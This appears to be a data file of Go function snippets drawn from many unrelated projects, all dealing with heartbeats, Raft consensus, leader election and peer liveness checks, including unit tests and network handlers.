\"\"\n\t}\n\t//fmt.Println(\"read done\")\n\n\tmessage := pk.DecodePacket(buf[:n])\n\tmessageType := message.Ptype\n\n\tif messageType == \"heartbeat\" {\n\t\t// heartbeat received\n\t\t// fmt.Println(\"heartbeat\")\n\t\tmsg := pk.DecodeHB(message)\n\n\t\tif (*nodePtr).IsIntroducer && msg.IsInitialization { // if this processor is a introducer and there is newly joined processor to the system\n\t\t\tcurrMsList := (*nodePtr).MsList\n\t\t\tcurrMsList = currMsList.Add(msg.Input.List[0], (*nodePtr).LocalTime)\n\t\t\tencodedMsg := pk.EncodePacket(\"heartbeat\", pk.EncodeHB(pk.HBpacket{currMsList, false}))\n\t\t\tconn.WriteToUDP(encodedMsg, addr)\n\t\t\tif (*(*nodePtr).ATAPtr) == true {\n\t\t\t\t_ = PingMsg((*nodePtr), currMsList, \"ata\", (*nodePtr).DestPortNum)\n\t\t\t} else {\n\t\t\t\t_ = PingMsg((*nodePtr), currMsList, \"gossip\", (*nodePtr).DestPortNum)\n\t\t\t}\n\n\t\t\treturn currMsList, portLog\n\t\t} else { // message is not an initialization message\n\t\t\t// message is dropped for failrate\n\t\t\ts1 := rand.NewSource(time.Now().UnixNano())\n\t\t\tr1 := rand.New(s1)\n\t\t\tif r1.Intn(100) < (*nodePtr).FailRate {\n\t\t\t\treturn ms.MsList{}, \"\"\n\t\t\t}\n\n\t\t\treturn msg.Input, portLog\n\t\t}\n\t} else {\n\t\tfmt.Println(\"Invalid HeartBeat:\", messageType)\n\t\treturn ms.MsList{}, portLog\n\t}\n}", "func TestMsgAppRespWaitReset(t *testing.T) {\n\tsm := newTestRaft(1, []uint64{1, 2, 3}, 5, 1, NewMemoryStorage())\n\tdefer closeAndFreeRaft(sm)\n\tsm.becomeCandidate()\n\tsm.becomeLeader()\n\n\t// The new leader has just emitted a new Term 4 entry; consume those messages\n\t// from the outgoing queue.\n\tsm.bcastAppend()\n\tsm.readMessages()\n\n\t// Node 2 acks the first entry, making it committed.\n\tsm.Step(pb.Message{\n\t\tFrom: 2,\n\t\tType: pb.MsgAppResp,\n\t\tIndex: 1,\n\t})\n\tif sm.raftLog.committed != 1 {\n\t\tt.Fatalf(\"expected committed to be 1, got %d\", sm.raftLog.committed)\n\t}\n\t// Also consume the MsgApp messages that update Commit on the followers.\n\tsm.readMessages()\n\n\t// A new command is now proposed on node 1.\n\tsm.Step(pb.Message{\n\t\tFrom: 1,\n\t\tType: pb.MsgProp,\n\t\tEntries: []pb.Entry{{}},\n\t})\n\n\t// The command is broadcast to all nodes not in the wait state.\n\t// Node 2 left the wait state due to its MsgAppResp, but node 3 is still waiting.\n\tmsgs := sm.readMessages()\n\tif len(msgs) != 1 {\n\t\tt.Fatalf(\"expected 1 message, got %d: %+v\", len(msgs), msgs)\n\t}\n\tif msgs[0].Type != pb.MsgApp || msgs[0].To != 2 {\n\t\tt.Errorf(\"expected MsgApp to node 2, got %v to %d\", msgs[0].Type, msgs[0].To)\n\t}\n\tif len(msgs[0].Entries) != 1 || msgs[0].Entries[0].Index != 2 {\n\t\tt.Errorf(\"expected to send entry 2, but got %v\", msgs[0].Entries)\n\t}\n\n\t// Now Node 3 acks the first entry. This releases the wait and entry 2 is sent.\n\tsm.Step(pb.Message{\n\t\tFrom: 3,\n\t\tType: pb.MsgAppResp,\n\t\tIndex: 1,\n\t})\n\tmsgs = sm.readMessages()\n\tif len(msgs) != 1 {\n\t\tt.Fatalf(\"expected 1 message, got %d: %+v\", len(msgs), msgs)\n\t}\n\tif msgs[0].Type != pb.MsgApp || msgs[0].To != 3 {\n\t\tt.Errorf(\"expected MsgApp to node 3, got %v to %d\", msgs[0].Type, msgs[0].To)\n\t}\n\tif len(msgs[0].Entries) != 1 || msgs[0].Entries[0].Index != 2 {\n\t\tt.Errorf(\"expected to send entry 2, but got %v\", msgs[0].Entries)\n\t}\n}", "func heartbeatEvent(event *types.Event) error {\n\theartbeats, err := parseHeartbeatMap(plugin.HeartbeatMap)\n\tif err != nil {\n\t\treturn err\n\t}\n\t// match entity/check names\n\tentity_check := fmt.Sprintf(\"%s/%s\", event.Entity.Name, event.Check.Name)\n\tif heartbeats[entity_check] != \"\" {\n\t\tfmt.Printf(\"Pinging heartbeat %s \\n\", heartbeats[entity_check])\n\t\terrPing := pingHeartbeat(heartbeats[entity_check])\n\t\tif errPing != nil {\n\t\t\treturn errPing\n\t\t}\n\t}\n\t// use any check\n\tentity_all := fmt.Sprintf(\"%s/all\", event.Entity.Name)\n\tif heartbeats[entity_all] != \"\" {\n\t\t// ping all alerts\n\t\tfmt.Printf(\"Pinging heartbeat %s with entity/all defined\\n\", heartbeats[entity_all])\n\t\terrPing := pingHeartbeat(heartbeats[entity_all])\n\t\tif errPing != nil {\n\t\t\treturn errPing\n\t\t}\n\t\treturn nil\n\t}\n\t// use any entity\n\tall_check := fmt.Sprintf(\"all/%s\", event.Check.Name)\n\tif heartbeats[all_check] != \"\" {\n\t\t// ping all alerts\n\t\tfmt.Printf(\"Pinging heartbeat %s with all/check defined\\n\", heartbeats[all_check])\n\t\terrPing := pingHeartbeat(heartbeats[all_check])\n\t\tif errPing != nil {\n\t\t\treturn errPing\n\t\t}\n\t\treturn nil\n\t}\n\tif heartbeats[\"all\"] != \"\" {\n\t\t// ping all alerts\n\t\tfmt.Printf(\"Pinging heartbeat %s with all/all defined\\n\", heartbeats[\"all\"])\n\t\terrPing := pingHeartbeat(heartbeats[\"all\"])\n\t\tif errPing != nil {\n\t\t\treturn errPing\n\t\t}\n\t\treturn nil\n\t}\n\tif len(heartbeats) != 0 {\n\t\tfmt.Println(\"Not pinging any heartbeat because entity/check defined do not match\")\n\t}\n\treturn nil\n}", "func checkBeat(db *sql.DB) (err error) {\n\tctx := context.Background()\n\tctx, cancel := context.WithTimeout(ctx, heartbeatTimeout)\n\tdefer cancel()\n\n\treturn db.PingContext(ctx)\n}", "func testLeaderCycle(t *testing.T, preVote bool) {\n\tvar cfg func(*Config)\n\tif preVote {\n\t\tcfg = preVoteConfig\n\t}\n\tn := newNetworkWithConfig(cfg, nil, nil, nil)\n\tdefer n.closeAll()\n\tfor campaignerID := uint64(1); campaignerID <= 3; campaignerID++ {\n\t\tn.send(pb.Message{From: campaignerID, To: campaignerID, Type: pb.MsgHup})\n\n\t\tfor _, peer := range n.peers {\n\t\t\tsm := peer.(*raft)\n\t\t\tif sm.id == campaignerID && sm.state != StateLeader {\n\t\t\t\tt.Errorf(\"preVote=%v: campaigning node %d state = %v, want StateLeader\",\n\t\t\t\t\tpreVote, sm.id, sm.state)\n\t\t\t} else if sm.id != campaignerID && sm.state != StateFollower {\n\t\t\t\tt.Errorf(\"preVote=%v: after campaign of node %d, \"+\n\t\t\t\t\t\"node %d had state = %v, want StateFollower\",\n\t\t\t\t\tpreVote, campaignerID, sm.id, sm.state)\n\t\t\t}\n\t\t}\n\t}\n}", "func (r *Raft) heartbeat(replication *followerReplication, stopCh chan struct{}) {\n\tvar failures uint64\n\treq := pb.AppendEntriesRequest{\n\t\tTerm: replication.currentTerm,\n\t\tLeader: r.transport.EncodePeer(r.localID, r.localAddr),\n\t}\n\tvar resp pb.AppendEntriesResponse\n\tfor {\n\t\t// Wait for the next heartbeat interval or forced notify\n\t\tselect {\n\t\tcase <-replication.notifyCh:\n\t\tcase <-randomTimeout(r.config().HeartbeatTimeout / 10): // [100ms, 200ms]\n\t\tcase <-stopCh:\n\t\t\treturn\n\t\t}\n\n\t\treplication.peerLock.RLock()\n\t\tpeer := replication.peer\n\t\treplication.peerLock.RUnlock()\n\n\t\tif err := r.transport.AppendEntries(peer.ID, peer.Address, &req, &resp); err != nil {\n\t\t\tklog.Errorf(fmt.Sprintf(\"failed to heartbeat from %s/%s to %s/%s err:%v\",\n\t\t\t\tr.localID, r.localAddr, peer.ID, peer.Address, err))\n\t\t\tr.observe(FailedHeartbeatObservation{PeerID: peer.ID, LastContact: replication.LastContact()})\n\n\t\t\t// backoff\n\t\t\tfailures++\n\t\t\tselect {\n\t\t\tcase <-time.After(backoff(failureWait, failures, maxFailureScale)):\n\t\t\tcase <-stopCh:\n\t\t\t\treturn\n\t\t\t}\n\t\t} else {\n\t\t\tif failures > 0 {\n\t\t\t\tr.observe(ResumedHeartbeatObservation{PeerID: peer.ID})\n\t\t\t}\n\n\t\t\treplication.setLastContact()\n\t\t\tfailures = 0\n\t\t\treplication.notifyAll(resp.Success)\n\t\t}\n\t}\n}", "func TestHB11NoHeader(t *testing.T) {\n\tn, _ := openConn(t)\n\tconn_headers := check11(TEST_HEADERS)\n\tc, _ := Connect(n, conn_headers)\n\tif c.protocol == SPL_10 {\n\t\t_ = closeConn(t, n)\n\t\treturn\n\t}\n\tif c.hbd != nil {\n\t\tt.Errorf(\"Expected no heartbeats for 1.1, no header\")\n\t}\n\t_ = c.Disconnect(empty_headers)\n\t_ = closeConn(t, n)\n}", "func TestActiveReplicatorHeartbeats(t *testing.T) {\n\tbase.SetUpTestLogging(t, logger.LevelDebug, logger.KeyWebSocket, logger.KeyWebSocketFrame)\n\n\trt := NewRestTester(t, &RestTesterConfig{\n\t\tDatabaseConfig: &DatabaseConfig{DbConfig: DbConfig{\n\t\t\tUsers: map[string]*db.PrincipalConfig{\n\t\t\t\t\"alice\": {Password: base.StringPtr(\"pass\")},\n\t\t\t},\n\t\t}},\n\t})\n\tdefer rt.Close()\n\n\t// Make rt listen on an actual HTTP port, so it can receive the blipsync request.\n\tsrv := httptest.NewServer(rt.TestPublicHandler())\n\tdefer srv.Close()\n\n\tpassiveDBURL, err := url.Parse(srv.URL + \"/db\")\n\trequire.NoError(t, err)\n\n\t// Add basic auth creds to target db URL\n\tpassiveDBURL.User = url.UserPassword(\"alice\", \"pass\")\n\n\tar := db.NewActiveReplicator(&db.ActiveReplicatorConfig{\n\t\tID: t.Name(),\n\t\tDirection: db.ActiveReplicatorTypePush,\n\t\tActiveDB: &db.Database{DatabaseContext: rt.GetDatabase()},\n\t\tRemoteDBURL: passiveDBURL,\n\t\tWebsocketPingInterval: time.Millisecond * 10,\n\t\tContinuous: true,\n\t\tReplicationStatsMap: base.SyncGatewayStats.NewDBStats(t.Name(), false, false, false).DBReplicatorStats(t.Name()),\n\t})\n\n\tpingCountStart := base.ExpvarVar2Int(expvar.Get(\"goblip\").(*expvar.Map).Get(\"sender_ping_count\"))\n\tpingGoroutinesStart := base.ExpvarVar2Int(expvar.Get(\"goblip\").(*expvar.Map).Get(\"goroutines_sender_ping\"))\n\n\tassert.NoError(t, ar.Start())\n\n\t// let some pings happen\n\ttime.Sleep(time.Millisecond * 500)\n\n\tpingGoroutines := base.ExpvarVar2Int(expvar.Get(\"goblip\").(*expvar.Map).Get(\"goroutines_sender_ping\"))\n\tassert.Equal(t, 1+pingGoroutinesStart, pingGoroutines, \"Expected ping sender goroutine to be 1 more than start\")\n\n\tpingCount := base.ExpvarVar2Int(expvar.Get(\"goblip\").(*expvar.Map).Get(\"sender_ping_count\"))\n\tassert.Greaterf(t, pingCount, pingCountStart, \"Expected ping count to increase since start\")\n\tassert.NoError(t, ar.Stop())\n\n\tpingGoroutines = base.ExpvarVar2Int(expvar.Get(\"goblip\").(*expvar.Map).Get(\"goroutines_sender_ping\"))\n\tassert.Equal(t, pingGoroutinesStart, pingGoroutines, \"Expected ping sender goroutine to return to start count after stop\")\n}", "func (rf *Raft) convertToLeader() {\n rf.mu.Lock()\n DLCPrintf(\"Server (%d)[state=%s, term=%d, votedFor=%d] convert to Leader\", rf.me, rf.state, rf.currentTerm, rf.votedFor)\n rf.electionTimer.Stop() \n rf.state = \"Leader\"\n for i:=0; i<len(rf.peers); i++ {\n rf.nextIndex[i] = rf.convertToGlobalViewIndex(len(rf.log))\n rf.matchIndex[i] = rf.convertToGlobalViewIndex(0)\n }\n rf.mu.Unlock()\n // 启动一个线程,定时给各个Follower发送HeartBeat Request \n time.Sleep(50 * time.Millisecond)\n go rf.sendAppendEntriesToMultipleFollowers()\n}", "func TestLeaderAcknowledgeCommit(t *testing.T) {\n\ttests := []struct {\n\t\tsize int\n\t\tacceptors map[uint64]bool\n\t\twack bool\n\t}{\n\t\t{1, nil, true},\n\t\t{3, nil, false},\n\t\t{3, map[uint64]bool{2: true}, true},\n\t\t{3, map[uint64]bool{2: true, 3: true}, true},\n\t\t{5, nil, false},\n\t\t{5, map[uint64]bool{2: true}, false},\n\t\t{5, map[uint64]bool{2: true, 3: true}, true},\n\t\t{5, map[uint64]bool{2: true, 3: true, 4: true}, true},\n\t\t{5, map[uint64]bool{2: true, 3: true, 4: true, 5: true}, true},\n\t}\n\tfor i, tt := range tests {\n\t\ts := NewMemoryStorage()\n\t\tr := newTestRaft(1, idsBySize(tt.size), 10, 1, s)\n\t\tdefer closeAndFreeRaft(r)\n\t\tr.becomeCandidate()\n\t\tr.becomeLeader()\n\t\tcommitNoopEntry(r, s)\n\t\tli := r.raftLog.lastIndex()\n\t\tr.Step(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{Data: []byte(\"some data\")}}})\n\n\t\tfor _, m := range r.readMessages() {\n\t\t\tif tt.acceptors[m.To] {\n\t\t\t\tr.Step(acceptAndReply(m))\n\t\t\t}\n\t\t}\n\n\t\tif g := r.raftLog.committed > li; g != tt.wack {\n\t\t\tt.Errorf(\"#%d: ack commit = %v, want %v\", i, g, tt.wack)\n\t\t}\n\t}\n}", "func (r *Raft) sendHeartbeat(to uint64) {\n\t//r.Prs[to].Next = r.RaftLog.LastIndex() + 1\n\tmsg := r.buildMsgWithoutData(pb.MessageType_MsgHeartbeat, to, false)\n\t//msg.Entries = entryValuesToPoints(r.RaftLog.entries[len(r.RaftLog.entries)-1:])\n\n\tr.appendMsg(msg)\n\t// Your Code Here (2A).\n}", "func SendHeartbeat(){\n\tHeartBeatTimer = time.NewTimer(time.Millisecond*1000)\n\tfor{\n\t\tselect{\n\t\t\tcase <-raft.AppendHeartbeat:\n\t\t\t\t\t\t//fmt.Println(\"in send SendHeartbeat-Append\")\n\t\t\t\t\t\tHeartBeatTimer = time.NewTimer(time.Millisecond*1000)\n\t\t\tcase <-raft.SendImmediateHeartBit:\n\t\t\t\t\t\tHeartBeatTimer = time.NewTimer(time.Millisecond*1000)\n\t\t\t\t\t\tSendBeat()\n\n\t\t\tcase <-HeartBeatTimer.C:\n\t\t\t\t\t\tHeartBeatTimer = time.NewTimer(time.Millisecond*1000)\n\t\t\t\t\t\tSendBeat()\n\t\t\t\t\t\tHeartBeatTimer = time.NewTimer(time.Millisecond*1000)\n\t\t\t\t\t\t//fmt.Println(\"iRegular Heartbeat\")\n\t\t\t\t\t\tHeartBeatTimer = time.NewTimer(time.Millisecond*500)\n\t\t\t\t\n\t\t}//end of select\n\t}//end of for loop\n}", "func (r *Raft) handleHeartbeat(m pb.Message) {\n\tif m.Term != None && m.Term < r.Term {\n\t\tr.sendHeartbeatResponse(m.From, true)\n\t\treturn\n\t}\n\tr.Lead = m.From\n\tr.electionElapsed = 0\n\tr.randomElectionTimeout = r.electionTimeout + rand.Intn(r.electionTimeout)\n\tr.sendHeartbeatResponse(m.From, false)\n}", "func sendInitHeartBeat() {\n\tif SELF_ADDR != FIRST_NODE_ADDR {\n\t\turl := FIRST_NODE_ADDR + \"/heartbeat/receive\"\n\t\tpeerMapJson, _ := Peers.PeerMapToJson()\n\t\tjsonStr := data.PrepareHeartBeatData(Peers.GetSelfId(), peerMapJson, SELF_ADDR)\n\t\tjsonString, _ := json.Marshal(jsonStr)\n\t\t_, err := http.Post(url, \"application/json\", bytes.NewBuffer(jsonString))\n\t\tif err != nil {\n\t\t\tfmt.Print(\"Error sending init message\")\n\t\t}\n\t}\n}", "func (rf *Raft) HeartbeatThread() {\n\tfor {\n\t\trf.lock()\n\t\tif rf.CurrentElectionState != Leader {\n\t\t\tad.DebugObj(rf, ad.TRACE, \"HeartbeatThread waiting until is leader\")\n\t\t\trf.unlock()\n\n\t\t\t// blocking read\n\t\twaitForBecomeLeader:\n\t\t\tterm := <-rf.becomeLeader\n\n\t\t\trf.lock()\n\t\t\tif term < rf.CurrentTerm {\n\t\t\t\t// I became leader in a previous term but then advanced to my current term before I\n\t\t\t\t// noticed I became a leader, so instead I should become a follower.\n\t\t\t\tad.DebugObj(rf, ad.WARN, \"Just noticed that I won election in term %d, but it's now term %d, so I'll stay a follower\",\n\t\t\t\t\tterm, rf.CurrentTerm)\n\t\t\t\tassert(rf.CurrentElectionState != Leader)\n\t\t\t\trf.unlock()\n\t\t\t\tgoto waitForBecomeLeader\n\t\t\t}\n\n\t\t\t// term > rf.CurrentTerm wouldn't make any sense\n\t\t\tassert(term == rf.CurrentTerm)\n\t\t\tad.DebugObj(rf, ad.RPC, \"Becoming leader\")\n\t\t\trf.CurrentElectionState = Leader\n\t\t\trf.writePersist()\n\t\t\tfor peerNum, _ := range rf.peers {\n\t\t\t\trf.nextIndex[peerNum] = rf.lastLogIndex() + 1\n\t\t\t\trf.matchIndex[peerNum] = 0\n\t\t\t}\n\t\t\trf.matchIndex[rf.me] = rf.Log.length()\n\t\t}\n\n\t\tif !rf.isAlive {\n\t\t\trf.unlock()\n\t\t\treturn\n\t\t}\n\n\t\tad.DebugObj(rf, ad.RPC, \"Sending heartbeats. commitIndex=%+v, nextIndex=%+v, matchIndex=%+v\",\n\t\t\trf.commitIndex, rf.nextIndex, rf.matchIndex)\n\t\tfor peerNum, _ := range rf.peers {\n\t\t\tgo rf.sendAppendEntries(peerNum, true)\n\t\t}\n\t\trf.unlock()\n\t\ttime.Sleep(getHeartbeatTimeout())\n\n\t}\n}", "func (r *Raft) leader() int {\n\t//fmt.Println(\"In leader(), I am: \", r.Myconfig.Id)\n\n\tr.sendAppendEntriesRPC() //send Heartbeats\n\t//waitTime := 4 //duration between two heartbeats\n\twaitTime := 1\n\twaitTime_secs := secs * time.Duration(waitTime)\n\t//fmt.Println(\"Heartbeat time out is\", waitTime)\n\n\twaitTimeAE := 5 //max time to wait for AE_Response\n\tHeartbeatTimer := r.StartTimer(HeartbeatTimeout, waitTime) //starts the timer and places timeout object on the channel\n\t//var AppendEntriesTimer *time.Timer\n\twaitStepDown := 7\n\tRetryTimer := r.StartTimer(RetryTimeOut, waitStepDown)\n\t//fmt.Println(\"I am\", r.Myconfig.Id, \"timer created\", AppendEntriesTimer)\n\tresponseCount := 0\n\tfor {\n\n\t\treq := r.receive() //wait for client append req,extract the msg received on self eventCh\n\t\tswitch req.(type) {\n\t\tcase ClientAppendReq:\n\t\t\t//reset the heartbeat timer, now this sendRPC will maintain the authority of the leader\n\t\t\tHeartbeatTimer.Reset(waitTime_secs)\n\t\t\trequest := req.(ClientAppendReq)\n\t\t\tdata := request.data\n\t\t\t//fmt.Println(\"Received CA request,cmd is: \", string(data))\n\t\t\t//No check for semantics of cmd before appending to log?\n\t\t\tr.AppendToLog_Leader(data) //append to self log as byte array\n\t\t\tr.sendAppendEntriesRPC()\n\t\t\tresponseCount = 0 //for RetryTimer\n\t\t\t//AppendEntriesTimer = r.StartTimer(AppendEntriesTimeOut, waitTimeAE) //Can be written in HeartBeatTimer too\n\t\t\t//fmt.Println(\"I am\", r.Myconfig.Id, \"Timer assigned a value\", AppendEntriesTimer)\n\t\tcase AppendEntriesResponse:\n\t\t\tresponse := req.(AppendEntriesResponse)\n\t\t\t//fmt.Println(\"got AE_Response! from : \", response.followerId, response)\n\t\t\tresponseCount += 1\n\t\t\tif responseCount >= majority {\n\t\t\t\twaitTime_retry := secs * time.Duration(waitStepDown)\n\t\t\t\tRetryTimer.Reset(waitTime_retry)\n\t\t\t}\n\t\t\t//when isHeartBeat is true then success is also true according to the code in serviceAEReq so case wont be there when isHB is true and success is false\n\t\t\t// isHB true means it is a succeeded heartbeat hence no work to do if it is AE req then only proceed else do nothing and continue\n\t\t\t//So when follower's log is stale or he is more latest, it would set isHB false\n\t\t\tif !response.isHeartBeat {\n\t\t\t\tretVal := r.serviceAppendEntriesResp(response, HeartbeatTimer, waitTimeAE, waitTime)\n\t\t\t\tif retVal == follower {\n\t\t\t\t\treturn follower\n\t\t\t\t}\n\n\t\t\t}\n\n\t\tcase AppendEntriesReq: // in case some other leader is also in function, it must fall back or remain leader\n\t\t\trequest := req.(AppendEntriesReq)\n\t\t\tif request.term > r.currentTerm {\n\t\t\t\t//fmt.Println(\"In leader,AE_Req case, I am \", r.Myconfig.Id, \"becoming follower now, because request.term, r.currentTerm\", request.term, r.currentTerm)\n\t\t\t\tr.currentTerm = request.term //update self term and step down\n\t\t\t\tr.votedFor = -1 //since term has increased so votedFor must be reset to reflect for this term\n\t\t\t\tr.WriteCVToDisk()\n\t\t\t\treturn follower //sender server is the latest leader, become follower\n\t\t\t} else {\n\t\t\t\t//reject the request sending false\n\t\t\t\treply := AppendEntriesResponse{r.currentTerm, false, r.Myconfig.Id, false, r.myMetaData.lastLogIndex}\n\t\t\t\tsend(request.leaderId, reply)\n\t\t\t}\n\n\t\tcase int: //Time out-time to send Heartbeats!\n\t\t\ttimeout := req.(int)\n\t\t\tif timeout == RetryTimeOut {\n\t\t\t\tRetryTimer.Stop()\n\t\t\t\treturn follower\n\t\t\t}\n\t\t\t//fmt.Println(\"Timeout of\", r.Myconfig.Id, \"is of type:\", timeout)\n\n\t\t\t//waitTime_secs := secs * time.Duration(waitTime)\n\t\t\tif timeout == HeartbeatTimeout {\n\t\t\t\t//fmt.Println(\"Leader:Reseting HB timer\")\n\t\t\t\tHeartbeatTimer.Reset(waitTime_secs)\n\t\t\t\tresponseCount = 0 //since new heartbeat is now being sent\n\t\t\t\t//it depends on nextIndex which is correctly read in prepAE_Req method,\n\t\t\t\t//since it was AE other than HB(last entry), it would have already modified the nextIndex map\n\t\t\t\tr.sendAppendEntriesRPC() //This either sends Heartbeats or retries the failed AE due to which the timeout happened,\n\t\t\t\t//HeartbeatTimer.Reset(secs * time.Duration(8)) //for checking leader change, setting timer of f4 to 8s--DOESN'T work..-_CHECK\n\t\t\t}\n\n\t\t}\n\t}\n}", "func testInitialPeersMsg(t *testing.T, peerPO, peerDepth int) {\n\t// generate random pivot address\n\tprvkey, err := crypto.GenerateKey()\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\n\tdefer func(orig func([]*BzzAddr) []*BzzAddr) {\n\t\tsortPeers = orig\n\t}(sortPeers)\n\tsortPeers = testSortPeers\n\tpivotAddr := pot.NewAddressFromBytes(PrivateKeyToBzzKey(prvkey))\n\t// generate control peers address at peerPO wrt pivot\n\tpeerAddr := pot.RandomAddressAt(pivotAddr, peerPO)\n\t// construct kademlia and hive\n\tto := NewKademlia(pivotAddr[:], NewKadParams())\n\thive := NewHive(NewHiveParams(), to, nil)\n\n\t// expected addrs in peersMsg response\n\tvar expBzzAddrs []*BzzAddr\n\tconnect := func(a pot.Address, po int) (addrs []*BzzAddr) {\n\t\tn := rand.Intn(maxPeersPerPO)\n\t\tfor i := 0; i < n; i++ {\n\t\t\tpeer, err := newDiscPeer(pot.RandomAddressAt(a, po))\n\t\t\tif err != nil {\n\t\t\t\tt.Fatal(err)\n\t\t\t}\n\t\t\thive.On(peer)\n\t\t\taddrs = append(addrs, peer.BzzAddr)\n\t\t}\n\t\treturn addrs\n\t}\n\tregister := func(a pot.Address, po int) {\n\t\taddr := pot.RandomAddressAt(a, po)\n\t\thive.Register(&BzzAddr{OAddr: addr[:]})\n\t}\n\n\t// generate connected and just registered peers\n\tfor po := maxPeerPO; po >= 0; po-- {\n\t\t// create a fake connected peer at po from peerAddr\n\t\tons := connect(peerAddr, po)\n\t\t// create a fake registered address at po from peerAddr\n\t\tregister(peerAddr, po)\n\t\t// we collect expected peer addresses only up till peerPO\n\t\tif po < peerDepth {\n\t\t\tcontinue\n\t\t}\n\t\texpBzzAddrs = append(expBzzAddrs, ons...)\n\t}\n\n\t// add extra connections closer to pivot than control\n\tfor po := peerPO + 1; po < maxPO; po++ {\n\t\tons := connect(pivotAddr, po)\n\t\tif peerDepth <= peerPO {\n\t\t\texpBzzAddrs = append(expBzzAddrs, ons...)\n\t\t}\n\t}\n\n\t// create a special bzzBaseTester in which we can associate `enode.ID` to the `bzzAddr` we created above\n\ts, _, err := newBzzBaseTesterWithAddrs(prvkey, [][]byte{peerAddr[:]}, DiscoverySpec, hive.Run)\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\tdefer s.Stop()\n\n\t// peerID to use in the protocol tester testExchange expect/trigger\n\tpeerID := s.Nodes[0].ID()\n\t// block until control peer is found among hive peers\n\tfound := false\n\tfor attempts := 0; attempts < 2000; attempts++ {\n\t\tfound = hive.Peer(peerID) != nil\n\t\tif found {\n\t\t\tbreak\n\t\t}\n\t\ttime.Sleep(1 * time.Millisecond)\n\t}\n\n\tif !found {\n\t\tt.Fatal(\"timeout waiting for peer connection to start\")\n\t}\n\n\t// pivotDepth is the advertised depth of the pivot node we expect in the outgoing subPeersMsg\n\tpivotDepth := hive.Saturation()\n\t// the test exchange is as follows:\n\t// 1. pivot sends to the control peer a `subPeersMsg` advertising its depth (ignored)\n\t// 2. peer sends to pivot a `subPeersMsg` advertising its own depth (arbitrarily chosen)\n\t// 3. pivot responds with `peersMsg` with the set of expected peers\n\terr = s.TestExchanges(\n\t\tp2ptest.Exchange{\n\t\t\tLabel: \"outgoing subPeersMsg\",\n\t\t\tExpects: []p2ptest.Expect{\n\t\t\t\t{\n\t\t\t\t\tCode: 1,\n\t\t\t\t\tMsg: &subPeersMsg{Depth: uint8(pivotDepth)},\n\t\t\t\t\tPeer: peerID,\n\t\t\t\t},\n\t\t\t},\n\t\t},\n\t\tp2ptest.Exchange{\n\t\t\tLabel: \"trigger subPeersMsg and expect peersMsg\",\n\t\t\tTriggers: []p2ptest.Trigger{\n\t\t\t\t{\n\t\t\t\t\tCode: 1,\n\t\t\t\t\tMsg: &subPeersMsg{Depth: uint8(peerDepth)},\n\t\t\t\t\tPeer: peerID,\n\t\t\t\t},\n\t\t\t},\n\t\t\tExpects: []p2ptest.Expect{\n\t\t\t\t{\n\t\t\t\t\tCode: 0,\n\t\t\t\t\tMsg: &peersMsg{Peers: testSortPeers(expBzzAddrs)},\n\t\t\t\t\tPeer: peerID,\n\t\t\t\t\tTimeout: 100 * time.Millisecond,\n\t\t\t\t},\n\t\t\t},\n\t\t})\n\n\t// for values MaxPeerPO < peerPO < MaxPO the pivot has no peers to offer to the control peer\n\t// in this case, no peersMsg will be sent out, and we would run into a time out\n\tif len(expBzzAddrs) == 0 {\n\t\tif err != nil {\n\t\t\tif err.Error() != \"exchange #1 \\\"trigger subPeersMsg and expect peersMsg\\\": timed out\" {\n\t\t\t\tt.Fatalf(\"expected timeout, got %v\", err)\n\t\t\t}\n\t\t\treturn\n\t\t}\n\t\tt.Fatalf(\"expected timeout, got no error\")\n\t}\n\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n}", "func HeartBeatReceive(w http.ResponseWriter, r *http.Request) {\n\tbody, err := ioutil.ReadAll(r.Body)\n\tif err != nil {\n\t\tprintln(err)\n\t}\n\theartBeatData := data.HeartBeatData{}\n\terr = json.Unmarshal([]byte(string(body)), &heartBeatData)\n\tif err != nil {\n\t\tprintln(err)\n\t}\n\theartBeatDataNew := heartBeatData\n\tPeers.InjectPeerMapJson(heartBeatDataNew.PeerMapJson, SELF_ADDR)\n\tPeers.Add(heartBeatDataNew.Addr, heartBeatDataNew.Id)\n\n\tif heartBeatDataNew.IfNewBlock {\n\t\tfmt.Println(\"RECEIVE A BLOCK\")\n\t\tnewBlock := p2.Block{}\n\t\tnewBlock.DecodeFromJson(heartBeatDataNew.BlockJson)\n\n\t\tif VerifyNonce(newBlock.GetNonce(), newBlock.GetParentHash(), newBlock.GetMPTRoot()) {\n\t\t\tfmt.Println(\"NONCE VERIFIED\")\n\t\t\tif !SBC.CheckParentHash(newBlock) {\n\t\t\t\tAskForBlock(newBlock.GetHeight()-1, newBlock.GetParentHash())\n\t\t\t}\n\t\t\tSBC.Insert(newBlock)\n\t\t} else {\n\t\t\tfmt.Println(\"NONCE NOT VERIFIED\")\n\t\t}\n\t}\n\tnewHops := heartBeatDataNew.Hops - 1\n\theartBeatDataNew.Hops = newHops\n\tif heartBeatDataNew.Hops > 0 {\n\t\tForwardHeartBeat(heartBeatDataNew)\n\t}\n\tw.WriteHeader(http.StatusOK)\n}", "func TestClock_AfterHeartbeatInterval(t *testing.T) {\n\tc := raft.NewClock()\n\tc.HeartbeatInterval = 10 * time.Millisecond\n\tt0 := time.Now()\n\t<-c.AfterHeartbeatInterval()\n\tif d := time.Since(t0); d < c.HeartbeatInterval {\n\t\tt.Fatalf(\"channel fired too soon: %v\", d)\n\t}\n}", "func (peer *Peer) heartbeat() {\n\tpeer.HeartbeatTicker = time.NewTicker(time.Second)\n\n\tfor {\n\t\t<-peer.HeartbeatTicker.C\n\n\t\t// Check For Defib\n\t\tif time.Now().After(peer.LastHeartbeat.Add(5 * time.Second)) {\n\t\t\tpeer.Logger.Warn(\"Peer\", \"%02X: Peer Defib (no response for >5 seconds)\", peer.ServerNetworkNode.ID)\n\t\t\tpeer.State = PeerStateDefib\n\t\t}\n\n\t\tswitch peer.State {\n\t\tcase PeerStateConnected:\n\t\t\terr := peer.SendPacket(packets.NewPacket(packets.CMD_HEARTBEAT, nil))\n\t\t\tif err != nil {\n\t\t\t\tpeer.Logger.Error(\"Peer\", \"%02X: Error Sending Heartbeat, disconnecting\", peer.ServerNetworkNode.ID)\n\t\t\t\tpeer.Disconnect()\n\t\t\t\treturn\n\t\t\t}\n\t\tcase PeerStateDefib:\n\t\t\tif time.Now().After(peer.LastHeartbeat.Add(10 * time.Second)) {\n\t\t\t\tpeer.Logger.Warn(\"Peer\", \"%02X: Peer DOA (Defib for 5 